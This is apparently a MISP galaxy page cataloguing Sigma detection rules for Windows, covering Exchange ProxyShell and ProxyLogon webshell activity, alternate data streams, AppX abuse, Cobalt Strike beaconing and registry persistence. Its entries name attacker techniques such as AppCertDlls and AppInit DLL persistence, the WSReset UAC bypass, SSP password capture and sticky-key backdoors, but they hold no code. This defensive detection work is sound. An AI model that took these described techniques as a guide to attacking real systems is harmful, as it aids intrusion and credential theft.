UUID 090ffaad-c01a-4879-850c-6d57da98452d which can be used as unique global reference for DNS Query To Ufile.io - DNS Client in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/16
falsepositive ['DNS queries for "ufile" are not malicious by nature necessarily. Investigate the source to determine the necessary actions to take']
filename win_dns_client_ufile_io.yml
level low
logsource.category No established category
logsource.product windows
tags ['attack.exfiltration', 'attack.t1567.002']
Related clusters

To see the related clusters, click here.

Suspicious Cobalt Strike DNS Beaconing - DNS Client

Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons

Internal MISP references

UUID 0d18728b-f5bf-4381-9dcf-915539fff6c2 which can be used as unique global reference for Suspicious Cobalt Strike DNS Beaconing - DNS Client in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/16
falsepositive ['Unknown']
filename win_dns_client__mal_cobaltstrike.yml
level critical
logsource.category No established category
logsource.product windows
tags ['attack.command_and_control', 'attack.t1071.004']
Related clusters

To see the related clusters, click here.

File Was Not Allowed To Run

Detect run not allowed files. Applocker is a very useful tool, especially on servers where unprivileged users have access. For example terminal servers. You need configure applocker and log collect to receive these events.

Internal MISP references

UUID 401e5d00-b944-11ea-8f9a-00163ecd60ae which can be used as unique global reference for File Was Not Allowed To Run in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Pushkarev Dmitry
creation_date 2020/06/28
falsepositive ['Need tuning applocker or add exceptions in SIEM']
filename win_applocker_file_was_not_allowed_to_run.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.execution', 'attack.t1204.002', 'attack.t1059.001', 'attack.t1059.003', 'attack.t1059.005', 'attack.t1059.006', 'attack.t1059.007']
Related clusters

To see the related clusters, click here.

Potential Active Directory Reconnaissance/Enumeration Via LDAP

Detects potential Active Directory enumeration via LDAP

Internal MISP references

UUID 31d68132-4038-47c7-8f8e-635a39a7c174 which can be used as unique global reference for Potential Active Directory Reconnaissance/Enumeration Via LDAP in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Adeem Mawani
creation_date 2021/06/22
falsepositive No established falsepositives
filename win_ldap_recon.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.discovery', 'attack.t1069.002', 'attack.t1087.002', 'attack.t1482']
Related clusters

To see the related clusters, click here.

Uncommon AppX Package Locations

Detects an appx package added the pipeline of the "to be processed" packages which is located in uncommon locations

Internal MISP references

UUID c977cb50-3dff-4a9f-b873-9290f56132f1 which can be used as unique global reference for Uncommon AppX Package Locations in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/11
falsepositive ['Unknown']
filename win_appxdeployment_server_uncommon_package_locations.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion']

Suspicious AppX Package Locations

Detects an appx package added the pipeline of the "to be processed" packages which is located in suspicious locations

Internal MISP references

UUID 5cdeaf3d-1489-477c-95ab-c318559fc051 which can be used as unique global reference for Suspicious AppX Package Locations in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/11
falsepositive ['Unknown']
filename win_appxdeployment_server_susp_package_locations.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion']

Suspicious Remote AppX Package Locations

Detects an appx package added the pipeline of the "to be processed" packages which is downloaded from a suspicious domain

Internal MISP references

UUID 8b48ad89-10d8-4382-a546-50588c410f0d which can be used as unique global reference for Suspicious Remote AppX Package Locations in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/11
falsepositive ['Unknown']
filename win_appxdeployment_server_susp_domains.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion']

Suspicious AppX Package Installation Attempt

Detects an appx package installation with the error code "0x80073cff" which indicates that the package didn't meet the signing requirements and could be suspicious

Internal MISP references

UUID 898d5fc9-fbc3-43de-93ad-38e97237c344 which can be used as unique global reference for Suspicious AppX Package Installation Attempt in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/11
falsepositive ['Legitimate AppX packages not signed by MS used part of an enterprise']
filename win_appxdeployment_server_susp_appx_package_installation.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion']

Deployment Of The AppX Package Was Blocked By The Policy

Detects an appx package deployment that was blocked by the local computer policy

Internal MISP references

UUID e021bbb5-407f-41f5-9dc9-1864c45a7a51 which can be used as unique global reference for Deployment Of The AppX Package Was Blocked By The Policy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2023/01/11
falsepositive ['Unknown']
filename win_appxdeployment_server_policy_block.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion']

Potential Malicious AppX Package Installation Attempts

Detects potential installation or installation attempts of known malicious appx packages

Internal MISP references

UUID 09d3b48b-be17-47f5-bf4e-94e7e75d09ce which can be used as unique global reference for Potential Malicious AppX Package Installation Attempts in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/11
falsepositive ['Rare occasions where a malicious package uses the exact same name and version as a legtimate application']
filename win_appxdeployment_server_mal_appx_names.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion']

Deployment AppX Package Was Blocked By AppLocker

Detects an appx package deployment that was blocked by AppLocker policy

Internal MISP references

UUID 6ae53108-c3a0-4bee-8f45-c7591a2c337f which can be used as unique global reference for Deployment AppX Package Was Blocked By AppLocker in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2023/01/11
falsepositive ['Unknown']
filename win_appxdeployment_server_applocker_block.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion']

Remove Exported Mailbox from Exchange Webserver

Detects removal of an exported Exchange mailbox which could be to cover tracks from ProxyShell exploit

Internal MISP references

UUID 09570ae5-889e-43ea-aac0-0e1221fb3d95 which can be used as unique global reference for Remove Exported Mailbox from Exchange Webserver in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021/08/27
falsepositive ['Unknown']
filename win_exchange_proxyshell_remove_mailbox_export.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070']
Related clusters

To see the related clusters, click here.

Exchange Set OabVirtualDirectory ExternalUrl Property

Rule to detect an adversary setting OabVirtualDirectory External URL property to a script in Exchange Management log

Internal MISP references

UUID 9db37458-4df2-46a5-95ab-307e7f29e675 which can be used as unique global reference for Exchange Set OabVirtualDirectory ExternalUrl Property in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Jose Rodriguez @Cyb3rPandaH
creation_date 2021/03/15
falsepositive ['Unknown']
filename win_exchange_set_oabvirtualdirectory_externalurl.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.persistence', 'attack.t1505.003']
Related clusters

To see the related clusters, click here.

Failed MSExchange Transport Agent Installation

Detects a failed installation of a Exchange Transport Agent

Internal MISP references

UUID c7d16cae-aaf3-42e5-9c1c-fb8553faa6fa which can be used as unique global reference for Failed MSExchange Transport Agent Installation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tobias Michalski (Nextron Systems)
creation_date 2021/06/08
falsepositive ['Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this.']
filename win_exchange_transportagent_failed.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.persistence', 'attack.t1505.002']
Related clusters

To see the related clusters, click here.

ProxyLogon MSExchange OabVirtualDirectory

Detects specific patterns found after a successful ProxyLogon exploitation in relation to a Commandlet invocation of Set-OabVirtualDirectory

Internal MISP references

UUID 550d3350-bb8a-4ff3-9533-2ba533f4a1c0 which can be used as unique global reference for ProxyLogon MSExchange OabVirtualDirectory in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/08/09
falsepositive ['Unlikely']
filename win_exchange_proxylogon_oabvirtualdir.yml
level critical
logsource.category No established category
logsource.product windows
tags ['attack.t1587.001', 'attack.resource_development']
Related clusters

To see the related clusters, click here.

Certificate Request Export to Exchange Webserver

Detects a write of an Exchange CSR to an untypical directory or with aspx name suffix which can be used to place a webshell

Internal MISP references

UUID b7bc7038-638b-4ffd-880c-292c692209ef which can be used as unique global reference for Certificate Request Export to Exchange Webserver in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Max Altgelt (Nextron Systems)
creation_date 2021/08/23
falsepositive ['Unlikely']
filename win_exchange_proxyshell_certificate_generation.yml
level critical
logsource.category No established category
logsource.product windows
tags ['attack.persistence', 'attack.t1505.003']
Related clusters

To see the related clusters, click here.

Mailbox Export to Exchange Webserver

Detects a successful export of an Exchange mailbox to untypical directory or with aspx name suffix which can be used to place a webshell or the needed role assignment for it

Internal MISP references

UUID 516376b4-05cd-4122-bae0-ad7641c38d48 which can be used as unique global reference for Mailbox Export to Exchange Webserver in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Rich Warren, Christian Burkard (Nextron Systems)
creation_date 2021/08/09
falsepositive ['Unlikely']
filename win_exchange_proxyshell_mailbox_export.yml
level critical
logsource.category No established category
logsource.product windows
tags ['attack.persistence', 'attack.t1505.003']
Related clusters

To see the related clusters, click here.

MSExchange Transport Agent Installation - Builtin

Detects the Installation of a Exchange Transport Agent

Internal MISP references

UUID 4fe151c2-ecf9-4fae-95ae-b88ec9c2fca6 which can be used as unique global reference for MSExchange Transport Agent Installation - Builtin in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tobias Michalski (Nextron Systems)
creation_date 2021/06/08
falsepositive ['Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this.']
filename win_exchange_transportagent.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.persistence', 'attack.t1505.002']
Related clusters

To see the related clusters, click here.

Exports Registry Key To an Alternate Data Stream

Exports the target Registry key and hides it in the specified alternate data stream.

Internal MISP references

UUID 0d7a9363-af70-4e7b-a3b7-1a176b7fbe84 which can be used as unique global reference for Exports Registry Key To an Alternate Data Stream in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Oddvar Moe, Sander Wiebing, oscd.community
creation_date 2020/10/07
falsepositive ['Unknown']
filename create_stream_hash_regedit_export_to_ads.yml
level high
logsource.category create_stream_hash
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1564.004']
Related clusters

To see the related clusters, click here.

Potentially Suspicious File Download From ZIP TLD

Detects the download of a file with a potentially suspicious extension from a .zip top level domain.

Internal MISP references

UUID 0bb4bbeb-fe52-4044-b40c-430a04577ebe which can be used as unique global reference for Potentially Suspicious File Download From ZIP TLD in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2023/05/18
falsepositive ['Legitimate file downloads from a websites and web services that uses the ".zip" top level domain.']
filename create_stream_hash_zip_tld_download.yml
level high
logsource.category create_stream_hash
logsource.product windows
tags ['attack.defense_evasion']

Unusual File Download From File Sharing Websites

Detects the download of suspicious file type from a well-known file and paste sharing domain

Internal MISP references

UUID ae02ed70-11aa-4a22-b397-c0d0e8f6ea99 which can be used as unique global reference for Unusual File Download From File Sharing Websites in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/08/24
falsepositive ['Unknown']
filename create_stream_hash_file_sharing_domains_download_unusual_extension.yml
level medium
logsource.category create_stream_hash
logsource.product windows
tags ['attack.defense_evasion', 'attack.s0139', 'attack.t1564.004']
Related clusters

To see the related clusters, click here.

HackTool Named File Stream Created

Detects the creation of a named file stream with the imphash of a well-known hack tool

Internal MISP references

UUID 19b041f6-e583-40dc-b842-d6fa8011493f which can be used as unique global reference for HackTool Named File Stream Created in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/08/24
falsepositive ['Unknown']
filename create_stream_hash_hktl_generic_download.yml
level high
logsource.category create_stream_hash
logsource.product windows
tags ['attack.defense_evasion', 'attack.s0139', 'attack.t1564.004']
Related clusters

To see the related clusters, click here.

Creation Of a Suspicious ADS File Outside a Browser Download

Detects the creation of a suspicious ADS (Alternate Data Stream) file by software other than browsers

Internal MISP references

UUID 573df571-a223-43bc-846e-3f98da481eca which can be used as unique global reference for Creation Of a Suspicious ADS File Outside a Browser Download in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/10/22
falsepositive ['Other legitimate browsers not currently included in the filter (please add them)', "Legitimate downloads via scripting or command-line tools (Investigate to determine if it's legitimate)"]
filename create_stream_hash_creation_internet_file.yml
level medium
logsource.category create_stream_hash
logsource.product windows
tags ['attack.defense_evasion']

Suspicious File Download From File Sharing Websites

Detects the download of suspicious file type from a well-known file and paste sharing domain

Internal MISP references

UUID 52182dfb-afb7-41db-b4bc-5336cb29b464 which can be used as unique global reference for Suspicious File Download From File Sharing Websites in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/08/24
falsepositive ['Some false positives might occur with binaries download via Github']
filename create_stream_hash_file_sharing_domains_download_susp_extension.yml
level high
logsource.category create_stream_hash
logsource.product windows
tags ['attack.defense_evasion', 'attack.s0139', 'attack.t1564.004']
Related clusters

To see the related clusters, click here.

Unusual File Download from Direct IP Address

Detects the download of suspicious file type from URLs with IP

Internal MISP references

UUID 025bd229-fd1f-4fdb-97ab-20006e1a5368 which can be used as unique global reference for Unusual File Download from Direct IP Address in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)
creation_date 2022/09/07
falsepositive ['Unknown']
filename create_stream_hash_susp_ip_domains.yml
level high
logsource.category create_stream_hash
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1564.004']
Related clusters

To see the related clusters, click here.

Potential Suspicious Winget Package Installation

Detects potential suspicious winget package installation from a suspicious source.

Internal MISP references

UUID a3f5c081-e75b-43a0-9f5b-51f26fe5dba2 which can be used as unique global reference for Potential Suspicious Winget Package Installation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/04/18
falsepositive ['Unknown']
filename create_stream_hash_winget_susp_package_source.yml
level high
logsource.category create_stream_hash
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence']

Hidden Executable In NTFS Alternate Data Stream

Detects the creation of an ADS (Alternate Data Stream) that contains an executable by looking at a non-empty Imphash

Internal MISP references

UUID b69888d4-380c-45ce-9cf9-d9ce46e67821 which can be used as unique global reference for Hidden Executable In NTFS Alternate Data Stream in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), @0xrawsec
creation_date 2018/06/03
falsepositive ["This rule isn't looking for any particular binary characteristics. As legitimate installers and programs were seen embedding hidden binaries in their ADS. Some false positives are expected from browser processes and similar."]
filename create_stream_hash_ads_executable.yml
level medium
logsource.category create_stream_hash
logsource.product windows
tags ['attack.defense_evasion', 'attack.s0139', 'attack.t1564.004']
Related clusters

To see the related clusters, click here.

Office Application Startup - Office Test

Detects the addition of office test registry that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started

Internal MISP references

UUID 3d27f6dd-1c74-4687-b4fa-ca849d128d1c which can be used as unique global reference for Office Application Startup - Office Test in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author omkar72
creation_date 2020/10/25
falsepositive ['Unlikely']
filename registry_event_office_test_regadd.yml
level medium
logsource.category registry_event
logsource.product windows
tags ['attack.persistence', 'attack.t1137.002']
Related clusters

To see the related clusters, click here.

RedMimicry Winnti Playbook Registry Manipulation

Detects actions caused by the RedMimicry Winnti playbook

Internal MISP references

UUID 5b175490-b652-4b02-b1de-5b5b4083c5f8 which can be used as unique global reference for RedMimicry Winnti Playbook Registry Manipulation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Alexander Rausch
creation_date 2020/06/24
falsepositive ['Unknown']
filename registry_event_redmimicry_winnti_reg.yml
level high
logsource.category registry_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Suspicious Camera and Microphone Access

Detects Processes accessing the camera and microphone from suspicious folder

Internal MISP references

UUID 62120148-6b7a-42be-8b91-271c04e281a3 which can be used as unique global reference for Suspicious Camera and Microphone Access in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Den Iuzvyk
creation_date 2020/06/07
falsepositive ['Unlikely, there could be conferencing software running from a Temp folder accessing the devices']
filename registry_event_susp_mic_cam_access.yml
level high
logsource.category registry_event
logsource.product windows
tags ['attack.collection', 'attack.t1125', 'attack.t1123']
Related clusters

To see the related clusters, click here.

Enable Remote Connection Between Anonymous Computer - AllowAnonymousCallback

Detects enabling of the "AllowAnonymousCallback" registry value, which allows a remote connection between computers that do not have a trust relationship.

Internal MISP references

UUID 4d431012-2ab5-4db7-a84e-b29809da2172 which can be used as unique global reference for Enable Remote Connection Between Anonymous Computer - AllowAnonymousCallback in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author X__Junior (Nextron Systems)
creation_date 2023/11/03
falsepositive ['Administrative activity']
filename registry_set_enable_anonymous_connection.yml
level medium
logsource.category registry_set
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

New PortProxy Registry Entry Added

Detects the modification of the PortProxy registry key which is used for port forwarding.

Internal MISP references

UUID a54f842a-3713-4b45-8c84-5f136fdebd3c which can be used as unique global reference for New PortProxy Registry Entry Added in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Andreas Hunkeler (@Karneades)
creation_date 2021/06/22
falsepositive ['WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723)', 'Synergy Software KVM (https://symless.com/synergy)']
filename registry_event_portproxy_registry_key.yml
level medium
logsource.category registry_event
logsource.product windows
tags ['attack.lateral_movement', 'attack.defense_evasion', 'attack.command_and_control', 'attack.t1090']
Related clusters

To see the related clusters, click here.

Registry Persistence Mechanisms in Recycle Bin

Detects persistence registry keys for Recycle Bin

Internal MISP references

UUID 277efb8f-60be-4f10-b4d3-037802f37167 which can be used as unique global reference for Registry Persistence Mechanisms in Recycle Bin in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/11/18
falsepositive ['Unknown']
filename registry_event_persistence_recycle_bin.yml
level high
logsource.category registry_event
logsource.product windows
tags ['attack.persistence', 'attack.t1547']
Related clusters

To see the related clusters, click here.

DLL Load via LSASS

Detects a method to load DLL via LSASS process using an undocumented Registry key

Internal MISP references

UUID b3503044-60ce-4bf4-bbcb-e3db98788823 which can be used as unique global reference for DLL Load via LSASS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2019/10/16
falsepositive ['Unknown']
filename registry_event_susp_lsass_dll_load.yml
level high
logsource.category registry_event
logsource.product windows
tags ['attack.execution', 'attack.persistence', 'attack.t1547.008']
Related clusters

To see the related clusters, click here.

Path To Screensaver Binary Modified

Detects value modification of registry key containing path to binary used as screensaver.

Internal MISP references

UUID 67a6c006-3fbe-46a7-9074-2ba3b82c3000 which can be used as unique global reference for Path To Screensaver Binary Modified in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Bartlomiej Czyz @bczyz1, oscd.community
creation_date 2020/10/11
falsepositive ['Legitimate modification of screensaver']
filename registry_event_modify_screensaver_binary_path.yml
level medium
logsource.category registry_event
logsource.product windows
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1546.002']
Related clusters

To see the related clusters, click here.

PrinterNightmare Mimikatz Driver Name

Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527

Internal MISP references

UUID ba6b9e43-1d45-4d3c-a504-1043a64c8469 which can be used as unique global reference for PrinterNightmare Mimikatz Driver Name in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Markus Neis, @markus_neis, Florian Roth
creation_date 2021/07/04
falsepositive ['Legitimate installation of printer driver QMS 810, Texas Instruments microLaser printer (unlikely)']
filename registry_event_mimikatz_printernightmare.yml
level critical
logsource.category registry_event
logsource.product windows
tags ['attack.execution', 'attack.t1204', 'cve.2021.1675', 'cve.2021.34527']
Related clusters

To see the related clusters, click here.

Suspicious Run Key from Download

Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories

Internal MISP references

UUID 9c5037d1-c568-49b3-88c7-9846a5bdc2be which can be used as unique global reference for Suspicious Run Key from Download in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2019/10/01
falsepositive ['Software installers downloaded and used by users']
filename registry_event_susp_download_run_key.yml
level high
logsource.category registry_event
logsource.product windows
tags ['attack.persistence', 'attack.t1547.001']
Related clusters

To see the related clusters, click here.

Windows Registry Trust Record Modification

Alerts on trust record modification within the registry, indicating usage of macros

Internal MISP references

UUID 295a59c1-7b79-4b47-a930-df12c15fc9c2 which can be used as unique global reference for Windows Registry Trust Record Modification in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Antonlovesdnb, Trent Liffick (@tliffick)
creation_date 2020/02/19
falsepositive ['This will alert on legitimate macro usage as well, additional tuning is required']
filename registry_event_office_trust_record_modification.yml
level medium
logsource.category registry_event
logsource.product windows
tags ['attack.initial_access', 'attack.t1566.001']
Related clusters

To see the related clusters, click here.

Run Once Task Configuration in Registry

Rule to detect the configuration of Run Once registry key. Configured payload can be run by runonce.exe /AlternateShellStartup

Internal MISP references

UUID c74d7efc-8826-45d9-b8bb-f04fac9e4eff which can be used as unique global reference for Run Once Task Configuration in Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Avneet Singh @v3t0_, oscd.community
creation_date 2020/11/15
falsepositive ['Legitimate modification of the registry key by legitimate program']
filename registry_event_runonce_persistence.yml
level medium
logsource.category registry_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

New DLL Added to AppCertDlls Registry Key

Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs value in the Registry key can be abused to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and run in the context of separate processes on the computer.

Internal MISP references

UUID 6aa1d992-5925-4e9f-a49b-845e51d1de01 which can be used as unique global reference for New DLL Added to AppCertDlls Registry Key in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ilyas Ochkov, oscd.community
creation_date 2019/10/25
falsepositive ['Unknown']
filename registry_event_new_dll_added_to_appcertdlls_registry_key.yml
level medium
logsource.category registry_event
logsource.product windows
tags ['attack.persistence', 'attack.t1546.009']
Related clusters

To see the related clusters, click here.

Potential Qakbot Registry Activity

Detects a registry key used by IceID in a campaign that distributes malicious OneNote files

Internal MISP references

UUID 1c8e96cd-2bed-487d-9de0-b46c90cade56 which can be used as unique global reference for Potential Qakbot Registry Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Hieu Tran
creation_date 2023/03/13
falsepositive ['Unknown']
filename registry_event_malware_qakbot_registry.yml
level high
logsource.category registry_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Disable Security Events Logging Adding Reg Key MiniNt

Detects the addition of a key 'MiniNt' to the registry. Upon a reboot, Windows Event Log service will stopped write events.

Internal MISP references

UUID 919f2ef0-be2d-4a7a-b635-eb2b41fde044 which can be used as unique global reference for Disable Security Events Logging Adding Reg Key MiniNt in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ilyas Ochkov, oscd.community
creation_date 2019/10/25
falsepositive ['Unknown']
filename registry_event_disable_security_events_logging_adding_reg_key_minint.yml
level high
logsource.category registry_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Creation of a Local Hidden User Account by Registry

Sysmon registry detection of a local hidden user account.

Internal MISP references

UUID 460479f3-80b7-42da-9c43-2cc1d54dbccd which can be used as unique global reference for Creation of a Local Hidden User Account by Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021/05/03
falsepositive ['Unknown']
filename registry_event_add_local_hidden_user.yml
level high
logsource.category registry_event
logsource.product windows
tags ['attack.persistence', 'attack.t1136.001']
Related clusters

To see the related clusters, click here.

Windows Credential Editor Registry

Detects the use of Windows Credential Editor (WCE)

Internal MISP references

UUID a6b33c02-8305-488f-8585-03cb2a7763f2 which can be used as unique global reference for Windows Credential Editor Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2019/12/31
falsepositive ['Unknown']
filename registry_event_hack_wce_reg.yml
level critical
logsource.category registry_event
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001', 'attack.s0005']
Related clusters

To see the related clusters, click here.

Security Support Provider (SSP) Added to LSA Configuration

Detects the addition of a SSP to the registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.

Internal MISP references

UUID eeb30123-9fbd-4ee8-aaa0-2e545bbed6dc which can be used as unique global reference for Security Support Provider (SSP) Added to LSA Configuration in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author iwillkeepwatch
creation_date 2019/01/18
falsepositive ['Unknown']
filename registry_event_ssp_added_lsa_config.yml
level high
logsource.category registry_event
logsource.product windows
tags ['attack.persistence', 'attack.t1547.005']
Related clusters

To see the related clusters, click here.

Leviathan Registry Key Activity

Detects registry key used by Leviathan APT in Malaysian focused campaign

Internal MISP references

UUID 70d43542-cd2d-483c-8f30-f16b436fd7db which can be used as unique global reference for Leviathan Registry Key Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Aidan Bracher
creation_date 2020/07/07
falsepositive No established falsepositives
filename registry_event_apt_leviathan.yml
level critical
logsource.category registry_event
logsource.product windows
tags ['attack.persistence', 'attack.t1547.001']
Related clusters

To see the related clusters, click here.

OceanLotus Registry Activity

Detects registry keys created in OceanLotus (also known as APT32) attacks

Internal MISP references

UUID 4ac5fc44-a601-4c06-955b-309df8c4e9d4 which can be used as unique global reference for OceanLotus Registry Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author megan201296, Jonhnathan Ribeiro
creation_date 2019/04/14
falsepositive ['Unknown']
filename registry_event_apt_oceanlotus_registry.yml
level critical
logsource.category registry_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

UAC Bypass Via Wsreset

Unfixed method for UAC bypass from Windows 10. WSReset.exe file associated with the Windows Store. It will run a binary file contained in a low-privilege registry.

Internal MISP references

UUID 6ea3bf32-9680-422d-9f50-e90716b12a66 which can be used as unique global reference for UAC Bypass Via Wsreset in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author oscd.community, Dmitry Uchakin
creation_date 2020/10/07
falsepositive ['Unknown']
filename registry_event_bypass_via_wsreset.yml
level high
logsource.category registry_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

NetNTLM Downgrade Attack - Registry

Detects NetNTLM downgrade attack

Internal MISP references

UUID d67572a0-e2ec-45d6-b8db-c100d14b8ef2 which can be used as unique global reference for NetNTLM Downgrade Attack - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), wagga
creation_date 2018/03/20
falsepositive ['Unknown']
filename registry_event_net_ntlm_downgrade.yml
level high
logsource.category registry_event
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Sticky Key Like Backdoor Usage - Registry

Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen

Internal MISP references

UUID baca5663-583c-45f9-b5dc-ea96a22ce542 which can be used as unique global reference for Sticky Key Like Backdoor Usage - Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community
creation_date 2018/03/15
falsepositive ['Unlikely']
filename registry_event_stickykey_like_backdoor.yml
level critical
logsource.category registry_event
logsource.product windows
tags ['attack.privilege_escalation', 'attack.persistence', 'attack.t1546.008', 'car.2014-11-003', 'car.2014-11-008']
Related clusters

To see the related clusters, click here.

New DLL Added to AppInit_DLLs Registry Key

DLLs that are specified in the AppInit_DLLs value in the Registry key HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows are loaded by user32.dll into every process that loads user32.dll

Internal MISP references

UUID 4f84b697-c9ed-4420-8ab5-e09af5b2345d which can be used as unique global reference for New DLL Added to AppInit_DLLs Registry Key in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
